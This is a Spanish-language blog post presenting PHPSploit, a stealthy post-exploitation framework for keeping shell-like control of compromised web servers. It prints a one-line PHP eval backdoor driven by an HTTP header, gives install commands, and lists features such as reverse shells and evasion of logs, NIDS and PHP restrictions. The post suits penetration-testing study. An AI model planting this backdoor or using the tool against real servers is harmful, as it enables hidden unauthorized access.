PHPSploit Framework Sigilo Post-Explotación
PHPSploit Framework Sigilo Post-Explotación
Junior Geeks·
Hacking y Pentesting
·1 Minuto de lectura

PHPSploit: Framework de Sigilo Post-Explotación

PhpSploit es un framework de control remoto, con el objetivo de proporcionar una conexión sigilosa interactiva tipo shell sobre HTTP entre el cliente y el servidor web. Es una herramienta de post-explotación capaz de mantener el acceso a un servidor web comprometido para propósitos de escalada de privilegios.

La comunicación ofuscada se lleva a cabo utilizando cabeceras HTTP bajo peticiones de clientes estándar y respuestas relativas del servidor web, tunelizadas a través de una diminuta puerta trasera polimórfica:

<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>
Demo PHPSploit
Demo PHPSploit

Inicio Rápido

git clone https://github.com/nil0x42/phpsploit
cd phpsploit/
pip3 install -r requirements.txt
./phpsploit --interactive --eval "help help"

Características

  • Eficiente: Más de 20 plugins para automatizar las tareas de escalada de privilegios
    • Ejecutar comandos y navegar por el sistema de archivos, pasando por encima de las restricciones de seguridad de PHP
    • Subir/Descargar archivos entre el cliente y el objetivo
    • Editar archivos remotos a través del editor de texto local
    • Ejecutar la consola SQL en el sistema de destino
    • Desprender shells TCP inversos
  • Sigilo: El framework está hecho por paranoicos, para paranoicos
    • Casi invisible por el análisis de los registros y la detección de la firma NIDS
    • Modo seguro y bypass de restricciones de seguridad PHP comunes
    • Las comunicaciones están ocultas en las cabeceras HTTP
    • Las cargas útiles cargadas se ofuscan para bypass NIDS
    • http/https/socks4/socks5 Soporte de proxy
  • Conveniente: Una interfaz robusta con muchas características cruciales
    • Ayuda detallada para cualquier opción (comando help)
    • Plataforma cruzada tanto en el cliente como en el servidor.
    • El CLI soporta autocompletado y multi-comando
    • Función de guardado/carga de sesión e historial persistente
    • Soporte de múltiples solicitudes para grandes cargas útiles (como las cargas)
    • Proporciona un potente motor de ajustes altamente configurable
    • Cada ajuste, como user-agent tiene un modo polimórfico
    • Variables de entorno personalizables para la interacción de los plugins
    • Proporciona una completa API de desarrollo de plugins

Plataformas soportadas (como atacante):

  • GNU/Linux
  • Mac OS X

Plataformas soportadas (como objetivo):

  • GNU/Linux
  • BSD-like
  • Mac OS X
  • Windows NT
Etiquetas
0 1 4 0

🤞 ¡El Gran Hermano te vigila, pero sabemos cómo detenerlo!

¡No enviamos spam! Lee nuestra Política de Privacidad para más información.

Junior Geeks
Junior Geeks es un colectivo de profesionales de la ciberseguridad y hacking ético con certificaciones de élite como OSCP (Offensive Security Certified Professional) y CEH (Certified Ethical Hacker).Nuestra misión en esgeeks.com es democratizar el conocimiento, proporcionando trucos y guías prácticas sobre sistemas operativos, seguridad y el mundo digital en general. Con más de una década combinada de experiencia, nuestro objetivo es darte las herramientas para que tú tengas el control.
Relacionado

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.

Mi Carro Close (×)

Tu carrito está vacío
Ver tienda